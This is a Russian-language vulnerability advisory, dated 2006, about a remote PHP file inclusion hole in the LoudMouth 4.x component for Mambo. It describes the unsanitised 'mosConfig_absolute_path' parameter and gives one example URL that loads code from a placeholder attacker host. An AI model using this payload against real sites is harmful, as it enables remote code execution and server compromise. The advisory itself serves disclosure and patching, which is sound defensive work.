PHP-инклюдинг в Mambo LoudMouth

Дата публикации:
19.07.2006
Дата изменения:
24.03.2009
Всего просмотров:
2048
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
LoudMouth 4.x (компонент к Mambo)
Уязвимые версии: LoudMouth (компонент Mambo) 4.1 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии com_loudmouth/includes/abbc/abbc.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]

URL производителя: mamboxchange.com/projects/loudmouth/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: com_loudmouth Mambo Component <= 4.0j Include Vulnerability

или введите имя

CAPTCHA